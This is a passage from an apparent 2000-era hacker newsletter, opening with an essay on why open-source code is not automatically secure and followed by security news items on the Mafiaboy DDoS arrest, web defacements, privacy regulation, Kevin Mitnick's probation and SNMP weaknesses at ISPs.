at OpenBSD, the Linux Auditing Project, or the developers or users of the
application. There have been plenty of security vulnerabilities in Open
Source Software that were discovered, not by peer review, but by black
hats. But there have been plenty of security vulnerabilities in Open
Source Software that were discovered, not by peer review, but by black
hats. Some security holes aren't discovered by the good guys until an
attacker's tools are found on a compromised site, network traffic captured
during an intrusion turns up signs of the exploit, or knowledge of the bug
finally bubbles up from the underground.
Why is this? When the security company Trusted Information Systems (TIS)
began making the source code of their Gauntlet firewall available to their
customers many years ago, they believed that their clients would check for
themselves how secure the product was. What they found instead was that
very few people outside of TIS ever sent in feedback, bug reports or
vulnerabilities. Nobody, it seems, is reading the source.
The fact is, most open source users run the software, but don't personally
read the code. They just assume that someone else will do the auditing for
them, and too often, it's the bad guys.
Even if people are reviewing the code, that doesn't mean they're qualified
to do so.
In the scientific world, peer review works because the people doing the
reviewing possess a comparable, or higher, technical caliber and level of
authority on the subject matter than the author.
It is generally true that the more people reviewing a piece of code, the
less likely it is the code will have a security flaw. But a single
well-trained reviewer who understands security and what the code is trying
to accomplish will be more effective than a hundred people who just
recently learned how to program.
It is easy to hide vulnerabilities in complex, little understood and
undocumented source code.
Old versions of the Sendmail mail transport agent implemented a DEBUG SMTP
command that allowed the connecting user to specify a set of commands
instead of an email address to receive the message. This was one of the
vulnerabilities exploited by the notorious Morris Internet worm.
Sendmail is one of the oldest examples of open source software, yet this
vulnerability, and many others, lay unfixed a long time. For years
Sendmail was plagued by security problems, because this monolithic
programs was very large, complicated, and little understood but for a few.
Vulnerabilities can be a lot more subtle than the Sendmail DEBUG command.
How many people really understand the ins and outs of a kernel based NFS
server? Are we sure its not leaking file handles in some instances? Ssh
1.2.27 is over seventy-one thousand lines of code (client and server). Are
we sure a subtle flaw does not weakening its key strength to only 40-bits?
There is no strong guarantee that source code and binaries of an
application have any real relationship.
All the benefits of source code peer review are irrelevant if you can not
be certain that a given binary application is the result of the reviewed
source code.
Ken Thompson made this very clear during his 1983 Turing Award lecture to
the ACM, in which he revealed a shocking, and subtle, software subversion
technique that's still illustrative seventeen years later.
Thompson modified the UNIX C compiler to recognize when the login program
was being compiled, and to insert a back door in the resulting binary code
such that it would allow him to login as any user using a "magic"
password.
Anyone reviewing the compiler source code could have found the back door,
except that Thompson then modified the compiler so that whenever it
compiled itself, it would insert both the code that inserts the login back
door, as well as code that modifies the compiler. With this new binary he
removed the modifications he had made and recompiled again.
He now had a trojaned compiler and clean source code. Anyone using his
compiler to compile either the login program , or the compiler, would
propagate his back doors.
The reason his attack worked is because the compiler has a bootstrapping
problem. You need a compiler to compile the compiler. You must obtain a
binary copy of the compiler before you can use it to translate the
compiler source code into a binary. There was no guarantee that the binary
compiler you were using was really related to the source code of the same.
Most applications do not have this bootstrapping problem. But how many
users of open source software compile all of their applications from
source?
A great number of open source users install precompiled software
distributions such as those from RedHat or Debian from CD-ROMs or FTP
sites without thinking twice whether the binary applications have any real
relationship to their source code.
While some of the binaries are cryptographically signed to verify the
identity of the packager, they make no other guarantees. Until the day
comes when a trusted distributor of binary open source software can issue
a strong cryptographic guarantee that a particular binary is the result of
a given source, any security expectations one may have about the source
can't be transferred to the binary.
Open Source makes it easy for the bad guys to find vulnerabilities.
Whatever potential Open Source has to make it easy for the good guys to
proactively find security vulnerabilities, also goes to the bad guys.
It is true that a black hat can find vulnerabilities in a binary-only
application, and that they can attempt to steal the source code to the
application from its closed source. But in the same amount of time they
can do that, they can audit ten different open source applications for
vulnerabilities. A bad guy that can operate a hex editor can probably
manage to grep source code for 'strcpy'.
Security through obscurity is not something you should depend on, but it
can be an effective deterrent if the attacker can find an easier target.
So does all this mean Open Source Software is no better than closed source
software when it comes to security vulnerabilities? No. Open Source
Software certainly does have the potential to be more secure than its
closed source counterpart.
But make no mistake, simply being open source is no guarantee of security.
Elias Levy is CTO of SecurityFocus.com, and the long-time moderator of
BUGTRAQ, one of the most read security mailing lists on the Internet. He's
served as a computer security consultant and security engineer, a UNIX
software developer, network engineer and system administrator.
@HWA
78.0 [HNN] Mafiaboy Charged for DDoS Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by Jon
The Royal Canadian Mounted Police have charged mafiaboy early this
morning in connection with the massive DDoS Attacks. Mafiaboy was
originally arrested last February in connection with the attacks but
was arrested again and charged over the weekend. The attacks crippled
online giants such as Yahoo, CNN, eBay, ZD Net. The investigation was
conducted jointly by the computer investigation unit of the RCMP, the
FBI and the U.S. Justice Department. and others. The RCMP will be
holding a press conferance today at 10:30a.
Associated Press - via ABC News
RCMP
http://abcnews.go.com/sections/tech/DailyNews/webattacks000419.html
http://www.rcmp.ca/html/press.htm
ABC News'
�Mafiaboy� Arrested
Canadian Teen Charged in Web Attacks
Kevin Schmidt, campus network programmer at the University of California at
Santa Barbara, shows the computer at the Engineering Department that
detected an unauthorized entry into the university computers. (Kevork
Djansezian/AP Photo)
By Jonathan Dube and Brian Ross
April 19 � A 15-year-old Canadian who goes by the online moniker �Mafiaboy�
has been arrested in connection with the February attacks on major Web
sites, ABCNEWS has learned.
* Mafiaboy caught. RealVideo video available on site
Canadian authorities obtained a search warrant for the teen�s home in the
Montreal area over the weekend and confiscated computer-related equipment
suspected of being used in the February attacks against major Web sites in
the U.S. Mafiaboy, whose identity is protected under Canadian law, was
arrested on April 15 and charged with �two counts of mischief to data� for
the attack that jammed up to 1,200 CNN-hosted Web sites for about two hours
Feb. 8, said Inspector Yves Roussel of the Royal Canadian Mounted Police at
a press conference this morning. After appearing in Youth Court Tuesday,
the 15-year-old was released on bail under the condition that he not use a
computer without a teacher present and he not visit stores that sell
computers or related equipment. The Web attacks alarmed Internet users
across the globe and shook the e-commerce industry because of the ease with
which major sites were made inaccessible. The attackers took over computers
around the world and used them to bombard victims� sites with so much data
that users could not access them.
School Computer Used in Attacks
Investigators were able to trace the attacks to Mafiaboy by examining the
log files of a computer at a University of California at Santa Barbara
research lab, which was among those used to attack the CNN.com site. A
hacker electronically broke into the UCSB computer on Feb. 8 and instructed
it to send large amounts of traffic to CNN.com�s Web site, campus network
programmer Kevin Schmidt told ABCNEWS.com. Roussel also said that the
suspect�s bragging about his exploits in chat rooms frequented by hackers
like Internet Relay Chat (IRC) had helped lead investigators to Mafiaboy.
Revealing Chat Room Logs
ABCNEWS.com first reported that Mafiaboy was one of the top suspects in the
attacks on Feb. 16. The FBI had obtained chat room logs showing that
Mafiaboy asked others what sites he should take down � before the sites
were attacked. Internet security expert Michael Lyle told ABCNEWS.com
at the time that he communicated with Mafiaboy and the 15-year-old claimed
credit for attacking not only CNN.com but also E*TRADE and several smaller
sites. Mafiaboy also shared technical information that only someone
involved in the attacks would know, Lyle said. �Mafiaboy was saying �What
should I hit next? What should I hit next?� and people on the channel were
suggesting sites, and Mafiaboy was saying, �OK, CNN,�� said Lyle, the chief
technology officer for Recourse Technologies Inc., an Internet security
company in Palo Alto, Calif. �And shortly thereafter the people on the
channel would be talking about CNN going down. If you look at the time
stamps on the logs, they also coincide with CNN going down.� Lyle said the
log files show similar discussions prior to the Feb. 9 attacks on E*TRADE
and several other smaller sites. A subscriber called �Mafiaboy� previously
held two accounts with Delphi Supernet, a Montreal Internet service
provider that Toronto-based ISP Internet Direct bought last year. The
accounts were closed in March 1998 because Mafiaboy violated subscriber
policies, but Internet Direct would not say what the violations entailed.
Authorities are unable to release specifics about the investigation because
it is ongoing, but both Roussel and the FBI�s William Lynn indicated there
could be more arrests. �A massive international crime investigation into
the remaining denial of service attacks continues,� said Lynn.
ABCNEWS' Simon Surowicz contributed to this report.
@HWA
79.0 [HNN] TerraServer Downtime Blamed on Malicious Activity
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by root66
After posting satellite pictures of the almost mythical Area 51 (Groom
Dry Lake Air Force Base), an Air Force testing and training facility
www.terraserver.com received over three times the normal traffic of
700,000 visitors in a day. When the server failed to respond to
additional requests the company blamed malicious intruders attempting
to bypass their firewall. (I'm sure three million visitors had nothing
to do with it.)
USA Today
Associated Press
http://www.usatoday.com/life/cyber/tech/cth737.htm
http://dailynews.yahoo.com/h/ap/20000418/us/area_51_8.html
USA today;
06/07/00- Updated 07:49 PM ET
Area 51 site invaded by impish earthlings Aerial photos of alleged UFO
base target of hacker high jinks
Apparently the good stuff's been moved to Area 52. This satellite image of
Groom Dry Lake AFB, known to UFO aficionados as Area 51, was taken by a
Russian satellite in March 1998. (AP) RALEIGH, N.C. (AP) - Many Internet
surfers ran into roadblocks Tuesday when they tried to reach a Web site
displaying the first detailed satellite images to be made public of Area
51, the supersecret Air Force test site that UFO buffs think is a
repository of alien technology.
Was it hackers, as the company said? Or a case for The X-Files?
The photos of the Nevada test site don't show any readily apparent signs
of flying saucers or little green men among the Air Force base buildings
and roadways.
Raleigh-based Aerial Images Inc. - in collaboration with Kodak, Digital
Equipment Corp., Autometric Inc. and the Russian agency Sovinformsputnik -
posted five images of the hush-hush desert proving ground on the Web on
Monday.
''This is the first glimpse into the most secret training and testing
facility for the Air Force,'' said John Hoffman, president of Aerial
Images.
Talk about the Area 51 aerial photos However, the partners' Web site,
www.terraserver.com, didn't respond much of the time Tuesday.
''The site is being hammered, and hackers are attacking it,'' Hoffman
said.
He said there were signs of hackers trying to penetrate the site's
firewall, the software designed to prevent unauthorized outsiders from
tampering with computer files. They couldn't reach the data, but they were
able to slow the system, Hoffman said.
He noted that the Area 51 photos had attracted an estimated 3 million
''page views'' to the Web site since Monday morning, compared with the
normal usage of 700,000 to 800,000 per day.
Viewing the images is free; downloading them costs $8.95 and up. Kodak
will make prints for $20 to $30.
The Air Force only recently acknowledged that Area 51 - the Groom Dry Lake
Air Force Base - even exists. The 8,000-square-mile base is 75 miles
northwest of Las Vegas, in the rugged Nellis Range.
Beginning with the U-2 spy plane in the 1950s, the base has been the
testing ground for a host of top-secret aircraft, including the SR-71
Blackbird, the F-117A stealth fighter and B-2 stealth bomber.
The site is known as Area 51 among UFO aficionados because that was the
base's designation on old Nevada test site maps. Some believe alien
vehicles, unidentified flying objects, are hidden at the base and their
parts are copied for U.S. prototypes.
Aerial Images launched a Russian satellite in 1998 to map the Earth's
surface under an open-skies agreement signed in 1992 by 24 nations,
including the United States and Russia.
The images have resolution good enough to distinguish a car from a truck.
Several government agencies are aware of the new images and haven't
responded, said Hoffman, 52. ''I've had no feedback from anybody that
indicates anybody gives a hoot,'' he said.
''We acknowledge having an operating site there, and the work is
classified,'' Air Force spokeswoman Gloria Cales said. The work involves
''operations critical to the U.S. military and the country's security.''
The images show hundreds of buildings including living quarters, tennis
courts, a baseball field, a track and a swimming pool, plus craters in the
ground.
Visible roads are not paved and there are no parking lots; buses are the
only visible vehicles. Some of the roads appear to run into cliffs,
suggesting an underground network.
Chris Carter, creator of The X-Files, apparently was skeptical when
Hoffman told him of the satellite images. Some of the show's favorite
themes are UFOs and secret government activities.
''He clearly didn't believe me,'' Hoffman said. ''From his tone, you could
tell he didn't believe me that we had Area 51 and we had the whole area
covered.''
(AREA 51, The groom lake facility uprooted and moved ages ago, it is now
located in White Sands... - Ed)
@HWA
80.0 [HNN] Ranum To Receives Clue Award
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by Bill
The Internet Security Conference (TISC) will present the inaugural
TISC CLUE Award to Marcus Ranum, internet security pioneer and CEO of
Network Flight Recorder, Inc. The TISC CLUE Award is given to those
individuals who have demonstrated that they indeed have a clue
regarding Internet security systems issues, design and deployment.
(WooHooo, Marcus!) The TISC CLUE Award presentation will take place
Wednesday, April 26th from 12:45:00 p.m. to 1:00 p.m. at the Fairmont
Hotel in San Jose, California. The TISC CLUE Award presentation is
open to the public free of charge
TISC
http://tisc.corecom.com
@HWA
81.0 [HNN] Ireland Eases Restrictions on Encryption Export Procedures
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by root66
Ireland, the world's largest computer software exporter, said it is
relaxing rules governing the export of mass market cryptographic items
used in electronic commerce to make it easier for companies to sell
abroad. The Irish government said it would no longer require software
companies operating in Ireland to apply for export licenses for
individual products or countries.
Bloomberg
http://quote.bloomberg.com/fgcgi.cgi?ptitle
@HWA
82.0 [HNN] Web Defacement Supports Separatists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by William Knowles
A web page defacement of the Guggenhiem museum in the Basque city of
Bilbao was defaced last weekend by supporters of the Basque separatist
group ETA. (Unfortunately the Associated Press decided to label this
childish act of vandalism as sabotage. Rather strong for a web page
defacement.)
Associated Press - via Las Vegas Sun
http://www.lasvegassun.com/sunbin/stories/tech/2000/apr/17/041700923.html
Dead Url
@HWA
83.0 [HNN] Exploits Protected by Copyright
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by Dogcow
An Australian newspaper is reporting that malicious netizens may be
able to claim copyright infringement in an interesting twist on
copyright law in Australia that prevents reverse engineering without
the permission of the copyright holder. The reverse engineering of
certain tools to aid in prosecution could be prevented unless done
with the copyright holders permission.
Australian IT
http://www.australianit.com.au/common/story_page/0,2405,582282%255E18%252D04%252D2000%255E,00.html
Hackers can claim copyright on tools DAVID HELLABY
ANTI-HACKER groups face problems giving evidence against groups or
individuals using software developed for breaking into computer systems,
because of a bizarre twist in copyright laws.
Australian Computer Emergency Response Team co-founder Rob McMillan said
anybody who reverse-engineered a hacking tool to see how it worked ran a
risk using the evidence in court because it could be a breach of the
author's copyright. The evidence may have been illegally obtained
and therefore be inadmissible, he said.
AusCERT was working with local lawmakers to close the loophole in
intellectual property legislation, he said.
"I don't know of any cases of hackers claiming copyright, but some have
large enough egos to consider it," Mr McMillan said.
US legislators had tackled the problem, he said.
The distributed denial of service attacks that shut down several large US
Web sites in February used software tools developed by hackers and
distributed over the Internet.
Local companies and organisations were under unprecedented attack this
year, Mr McMillan said. There had been more computer security incidents
reported in the first three months this year than for the whole of last
year.
About 2000 incidents ranging from scanning of systems to denial of service
attacks were reported to AusCERT to the end of March.
Mr McMillan warned the security situation was not likely to improve.
"We are on the verge of a major leap in technology, but as our knowledge
increases so does the knowledge of those we are up against," he said.
Contrary to what some thought, AusCERT was not an enforcement organisation
but assisted members with advice on dealing with security situations, he
said. It was often unable to report incidents to police because a member
organisation that had suffered an attack did not want it reported.
But AusCERT maintained a good relationship with law enforcement
authorities and often acted as a conduit for information from people and
organisations that did not want to be identified, he said.
@HWA
84.0 [HNN] The Erosion of Privacy on the Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 19th
contributed by root66
Looks like we missed it when it first came out but the March 20
edition of Business Week has an excellent story on the state of online
privacy today. They are theorize where the future could go and just
how bad it might get. If you have been sitting idly by ignoring the
privacy issues we suggest you read this.
Business Week
http://www.businessweek.com/2000/00_12/b3673001.htm
It's Time for Rules in Wonderland Here's Business Week's four-point plan
to solve the Internet privacy mess
If Lewis Carroll had written about Alice's adventures today, she would
find herself passing through the looking glass and into cyberspace. She
would meet up with dodos, duchesses, and eggheads, some of whom would
spout the rough equivalent of '''Twas brillig, and the slithy toves....''
The journey also would be full of rude surprises. As in Carroll's books,
she would eventually discover who she really was. But many others she had
never met would learn about her, too. Indeed, with every click of the
mouse, a bit more of her privacy would vanish down the rabbit hole.
These days, a lot of people are stumbling on similar unpleasant surprises.
Thanks to a string of privacy gaffes involving DoubleClick (DCLK),
RealNetworks (RNWK), Amazon.com (AMZN), and other major Web sites,
consumers are learning that e-commerce companies have an intense interest
in their private information. For about 9 cents, some medical data sites
will sell you your neighbor's history of urinary tract infections. Your
speeding tickets, bounced checks, and delayed child-support payments are
an open book. In the background, advertising services are building
profiles of where people browse, what they buy, how they think, and who
they are. Hundreds of sites already are stockpiling this type of
information--some to use in targeted advertising, others to sell or trade
with other sites.
GOLD RUSH. It will get worse. The tricks being played today are child's
play compared with what's coming. Web sites that want to know you better
will soon be able to track your movements on Web phones, palm devices, and
video games, and parse the data with more subtle software. Online services
can be layered with mounds of data about each person. Interactive TVs, for
instance, have the potential to correlate the Web sites you visit at work
with the ads you see at home in the evening.
Web surfers don't need extra proof that this gold rush for personal data
is alarming. In a new Business Week/Harris Poll (page 96), 92% of Net
users expressed discomfort about Web sites sharing personal information
with other sites. The public outcry has grown so loud that in February,
search engine AltaVista Co. promised to ask explicit permission before
sharing visitors' personal information with other companies. On Mar. 2,
DoubleClick bowed to public pressure on a similar point: The company,
which serves up ads on many Web sites, has created anonymous digital
snapshots, or ''profiles,'' of millions of cybersurfers, based on where
they browse and what they do online. DoubleClick had planned to link
profiles with much more specific information, including names and
addresses culled from real-world databases that cover 90% of American
households. The company dropped that controversial plan, and within days,
smaller rival 24/7 Media Inc. abandoned a similar strategy.
Anonymous tracking and profiling by DoubleClick and 24/7 can be very
subtle. But sometimes privacy violations hit you in the face. We have all
heard the examples of sociopaths who stalk their victims online. We have
seen the statistics on ''identity theft,'' in which criminals suck enough
personal data off the Net to impersonate other people. Perhaps these are
extreme examples. Even without them, many cybersurfers are starting to
feel that they have spent quite enough time at this particular Mad Tea
Party. They are ready for privacy rules that set some plain and simple
boundaries. In the March Business Week/Harris Poll, 57% of respondents
said government should pass laws on how personal information is collected.
''What's going on today is exponentially more threatening to those who
want to protect privacy,'' says Eliot Spitzer, New York's state attorney
general who has proposed privacy legislation. People can't make informed
decisions on the Net because they lack the necessary information. ''What
we're confronting is a market failure,'' says Spitzer.
Responding to a growing chorus of privacy-related complaints, some states
have drafted legislation ranging from curtailing the sale of personal
information to the creation of a privacy ombudsman. But this piecemeal,
state-by-state approach is a muddle. Scattershot laws will only create
more confusion. Over time, they will choke budding e-business in complex
litigation and red tape.
Business Week believes there is a better way. Instead of a conflicting
patchwork of state rules, the federal government should adopt clear
privacy standards in the spirit of the Fair Information Practices--a
philosophical framework for privacy protection that has been adopted
worldwide over the past 25 years. The broad principles are essential:
-- Companies conducting business online should be required by law to
disclose clearly how they collect and use information.
-- Consumers must be given control of how their data are used. --
Web surfers should also have the ability to inspect that data and to
correct any errors they discover.
-- And when companies break the rules, the government must have the power
to impose penalties. ''All of these bits you are sending out are your
digital DNA,'' says Tara Lemmey, president of the Electronic Frontier
Foundation. ''You should have control of that.''
Regulation flies in the face of the approach industry has been
championing. For the past four years, Net companies have insisted that
they can police themselves on privacy. ''Industry initiatives and market
forces are already doing a good job,'' says Daniel J. Jaye, co-founder of
Engage Technologies Inc., which dishes up ads on the Web.
In other words, the market will punish companies that fall afoul of
consumers. Bringing in the government, execs say, will pile bureaucratic
layers on top of the Net. This could undercut the very promise of
efficiency that many online businesses are counting on. The Internet, they
say, is supposed to draw companies closer to their customers, allowing
them to anticipate their desires. With profile data, they can target their
ads, slash wasteful and random marketing costs, design products faster,
and build higher profit margins. Profiling provides the underpinnings of a
new way of doing business upon which the Net Economy is built.
Laws that require businesses to seek users' permission before they collect
or use data about Web-surfing habits could kill this goose, they say. And
why do that, industry execs ask, when they are making such fine strides in
protecting consumer privacy? As a positive sign, Net businesses trumpet a
May, 1999, Federal Trade Commission survey in which 66% of companies
queried had privacy policies.
SELF-REGULATORY SHAM. We are not persuaded by these arguments. Few Web
sites give consumers real choices over the data that get collected online.
There is no proof that if given a choice--especially bolstered with
financial incentives proffered by Web merchants--consumers won't willingly
hand over some personal data. As for privacy policies, the same FTC survey
showed that while more than 90% of companies polled collected personal
information, fewer than 10% actually followed all of the established Fair
Information Practices.
In short, self-regulation is a sham. The policies that companies have
posted under pressure from the government are as vague and confusing as
anything Lewis Carroll could have dreamed up. One simple example: When
people register at Yahoo! Inc. (YHOO) for one of its services, such as My
Yahoo, they are asked to provide their birth date and e-mail
address--ostensibly as a safeguard if they forget their user name and need
prompting. But Yahoo also uses that information for a service called the
Birthday Club, sending product offers from three to five merchants to
users via e-mail on their birthday.
Don't look for transparency here. Most sites don't limit how they or their
partners use consumer information. And Web sites can transfer information
to partners without telling their own customers. Many sites also change
their practices at will and without warning.
Because privacy breaches are so corrosive to consumer trust, some Web
execs actually welcome broad national standards. IBM (IBM) and Walt Disney
Co. (DIS) have decided not to advertise on Web sites that don't have
privacy policies. Privacy codes must be clearer, says Chris Larsen, CEO
and founder of E-Loan Inc. (EELN), an online loan service that has its
privacy policies audited. ''I think the industry has squandered the
opportunity to take care of this on its own.'' IBM Chairman Louis Gerstner
doesn't go that far. But he has warned Net executives that they must get
serious. ''I am troubled, very troubled, by leaders who have failed to
recognize our responsibility in the transformation of the new economy,''
he says.
We hope other Web execs are listening closely. The policies we propose are
in the best interests of Web businesses. If more consumers can be assured
that their personal information is safe, more of them will flock to the
Net--and click, not exit. There are other explicit benefits for the
industry. Privacy standards create a level playing field, so companies
don't fall into an arms war, each trying to collect the most data--at any
cost. ''Business will benefit from the right level of government
involvement,'' says Nick Grouf, founder of PeoplePC, which offers cheap
PCs and Net connections. ''Standards are good, but they need some teeth,
and this is where government becomes a good partner.''
FEDERAL STANDARD. In the long term, the privacy protection that Business
Week espouses will make life simpler for businesses on the Net. More than
20 states already are moving to enact some kind of guarantees. A minimum
federal standard of online privacy would decrease the cost and complexity
for companies. It also would increase trust. If businesses really want to
be close to their customers, trust is paramount. This approach also will
shrink the gap that has arisen between the U.S. and Europe, where privacy
already is recognized as a right. The Europeans have stood firm, putting
American companies in the peculiar position of extending greater privacy
protection in Germany or France than at home.
It's time to iron out the inconsistencies. Here are our prescriptions for
protecting personal privacy without jeopardizing the promise of
e-commerce...
@HWA
85.0 [HNN] MafiaBoy Released on Bail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by Macki
MafiaBoy, a fifteen year old teenager from Montreal, has been released
on bail after appearing Monday in Youth Court for having been accused
of launching a DDoS attack on CNN. He was released under bail
conditions that included a ban on connecting to the Internet or going
to libraries, universities, stores and other places with public access
to computers or computer equipment. An RCMP investigator said the boy
was tracked through traces he left of his computer activity. (The
interesting part is that he has only been charged with the CNN attack
which means he either covered his tracks rather well on the others or
there are more perpetrators yet to be found.)
Nando Times
MafiaBoy IRC Logs
2600 Magazine has posted what they say are IRC logs of someone posing
as Mafiaboy to investigators. Hopefully the FBI is not using these
same fake logs as evidence.
2600.com
http://www.nandotimes.com/technology/story/body/0,1634,500194839-500265475-501381121-0,00.html
http://www.2600.com/news/2000/0420.html
@HWA
86.0 [HNN] Mitnick Banned from Speaking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by William Knowles
A Federal Judge has ruled that Kevin Mitnick can not speak at the Utah
Information Technologies Association conference in Salt Lake City. The
Judge felt that the conference was "consulting or advising" which is
prohibited by his probation agreement. Organizers are hoping to fill
the slot with an industry executive.
Desert News
http://deseretnews.com/dn/view/0,1249,160008642,00.html?
Federal judge bans convicted hacker from taking part in tech conference A
federal judge Monday banned convicted computer hacker Kevin Mitnick from
taking part in a technology conference in Salt Lake City Wednesday.
Mitnick, who gained notoriety for his hacking exploits and spent several
years in a federal prison in Lompac, Calif., won't be sitting on a computer
security panel discussion at the Utah Information Technologies Association
conference at the Salt Palace Convention Center. The judge kiboshed the
appearance because Mitnick's prison release agreement prohibits him from
"consulting or advising" on the topic of computer-related activity. Monday,
Mitnick did an extended interview promoting the panel discussion on KSL's
Doug Wright Show, where he answered callers' questions about computer
security and told the story of his hacking exploits. He hacked for fun, he
said, and never made any money from it. Richard Nelson, president of UITA,
said Mitnick's public relations representative had indicated that Mitnick
had permission to appear from the U.S. probation office in California. A
few days ago, the organization learned he might not be able to leave
California. Conference organizers are in the process of arranging a
replacement for Mitnick on the cyber-security panel. They are planning on
bringing in a senior staffer from a large company that deals with cyber
security. Nelson said he's sorry Mitnick can't participate. "He's eager to
talk and disappointed he can't come. If you listened (to him on the radio
show), he recognizes he made serious mistakes and he wanted to go forward.
"We're not trying to promote his career, but if he can help information
technology companies in Utah and decision makers dealing with security
issues determine what level of risk they want to take, that's good. There
will always be risk, but you can reduce it by taking security measures."
The UITA conference, "Net Trends 2000: The Digital Revolution" takes
place Wednesday and Thursday.
@HWA
87.0 [HNN] Top Politicos Meet to Discuss Infrastructure Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by Weld Pond
We have seen numerous press reports regarding a recent meeting at the
Old Executive office building in support of the Critical Information
Assurance Office. Several top level officials attended the meeting.
Probably the best description of the event we have found was posted by
Russ Cooper to NTBugTraq.
NT BugTraq
http://www.NTBUGTRAQ.COM/default.asp?pid
Not found. tried searching archives but didn't spend too much time. - Ed
@HWA
88.0 [HNN] NSF To Issue Grants for Security Schooling
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by mortel
Applications for grants for the Federal Cyber Services program should
be released by the National Science Foundation next month. The grants
will be used by Colleges and Universities to award scholarships to
students studying information security.
Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0417/web-cyber-04-19-00.asp
NSF launching grants for cybercorps BY Colleen O�Hara 04/19/2000 RELATED
STORIES
"Wanted: Digital defenders" [Federal Computer Week, Jan. 24, 2000]
More from FOSE "Litronic to secure DOD e-mail"
"Experts give geography lesson"
"Reno: Communication barrier to accessibility"
"Compensation for IT workers gets closer look"
"JetForm unveils 'Jaguar'"
The National Science Foundation is expected to release applications next
month for grants that would fund the Federal Cyber Services program
designed to train the next generation of digital defenders.
The NSF grants would be available to colleges and universities, which
would use the money to award scholarships to students to study information
assurance. These students would receive the scholarships in exchange for
full-time employment with a federal agency upon graduation. The students
would help protect the government�s systems from cyberattack.
NSF hopes to announce by September or October which schools will receive
the grants and hopes to award the actual student scholarships by January
2001, said Shirley Malia, program manager for education and training with
the government�s Critical Infrastructure Assurance Office, speaking at the
FOSE conference.
Malia said plans also are under way to establish a virtual nationwide
network of training centers that offer information assurance courses. The
courses would match a set of competencies for information assurance
professionals that the Office of Personnel Management is developing. The
hope is that agencies would use these centers to keep their cybersecurity
workers trained. "If we don�t keep the skills of information assurance
[workers] up-to-date, we are extremely vulnerable," Malia said.
The Cyber Services and virtual training network projects are dependent on
fiscal 2001 funding to proceed, Malia said
@HWA
89.0 [HNN] CalPoly Charges Student with Port Scanning
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by Zorro
The California Polytechnic State University has charged computer
engineering sophomore Paul Reed, with a violation of Title V of the
California Code of Regulations. Mr. Reed was attempting to find a
machine within a DHCP range that was located at a company he worked
for off campus but he conducted his scan from his dorm room using the
CalPoly computer network.
Free Paul
http://freepaul.org/
@HWA
90.0 [HNN] Encrypted Sheet Music Available on Net Soon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by root66
Net4music, which has been given access to one million of EMI's songs
will start to post the sheet music to the Net by the end of April.
Net4music will sell sheet music at $3.95 per download but will use use
a software lock to only allow five printouts of the music. (Five? All
people need is one copy, and access to a photocopier.)
Wired
http://www.wired.com/news/culture/0,1284,35735,00.html
EMI Plays Along with Downloads
by Brad King
3:00 a.m. Apr. 19, 2000 PDT
Musicians who want to play along with Aerosmith, Lenny Kravitz, or The
Counting Crows will soon have access to EMI Music Publishing's sheet
music library online.
The subsidiary of the EMI music label on Tuesday said it will give
digital rights management company Net4Music access to one million of
the label's songs in exchange for a minority equity stake.
Net4Music will post 1,000 titles on its site by the end of April, and then
will add 10,000 songs each month until 100,000 songs are posted.
This is the first time a major label has taken steps to have its entire
catalog encoded and sold in digital format.
"This is a niche market for musicians and people who are looking for sheet
music to play," said Martin Bandier, CEO of EMI Publishing. "It's tough to
find a music store that sells sheet music. Now all you have to do is have
a computer terminal."
Net4Music will offer single songs for $3.95 per copy, but the downloads
will feature encryption that limits the number of printouts that can be
made.
Similar types of digital encryption that limit the reuse of content after
purchase, such as SDMI, InterTrust, and Sony's memory stick, have been
failures with consumers. Meanwhile, other attempts at securing content,
like Windows Media Audio, Liquid Audio, and e-books, have proven too easy
to circumvent.
Francois DuLiege, CEO of Net4Music, said his encryption system will not
discourage consumers.
"You will pay less for five copies of digital sheet music than you would
for one copy of sheet music if you went to a retail store," he said. "Most
songs in retail stores don't sell single sets of music, so you have to
purchase the whole package. This, I believe, is much easier for
consumers."
The major music labels have been slow to make recorded music and
compositions available in digital form, but rights management company
Sunhawk set a precedent by signing a deal in 1998 to digitize content from
Warner Music's music catalog.
Sunhawk has been digitizing Warner's Christian music for two years, but
has only digitized about 10,000 songs thus far, having branched out to
encode and digitize other media beyond music.
EMI's Bandier believes the Net4Music deal will expand demand for EMI
content.
"The Christian music business is a small homespun business that is
dependent upon the congregation and others knowing all the lyrics to the
music, so getting that content out there as quickly as possible was
important," Bandier said. "But that only makes up about 5 percent of our
business."
Sunhawk CEO Marlin Eller said the deal will only help move the music
industry to embrace digital e-commerce.
"This validates exactly what we are trying to do digitally," Eller said.
"Industry executives should learn to get off their butts and license their
content. We haven't been seeing theft with this content so far. But (the
reluctant labels) are allowing piracy to take place by not putting up a
legitimate source of content"
@HWA
91.0 [HNN] ISPs Still Vulnerable to SNMP Holes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Javaman
Whiles holes in SNMP are nothing new it is surprising just how
vulnerable some ISPs still are to the problem. Philtered.net says that
now a malicious person could extract an ISP users login name and phone
number directly from the terminal server thereby equating an IP
address with a real person.
Internet News
Philtered.net
http://www.internetnews.com/isp-news/article/0,2171,8_344971,00.html
http://www.philtered.net/
ISPs Battle Privacy Loophole By Brian McWilliams
Internet service providers Thursday are being warned to batten down their
network access servers against a familiar type of privacy attack that's
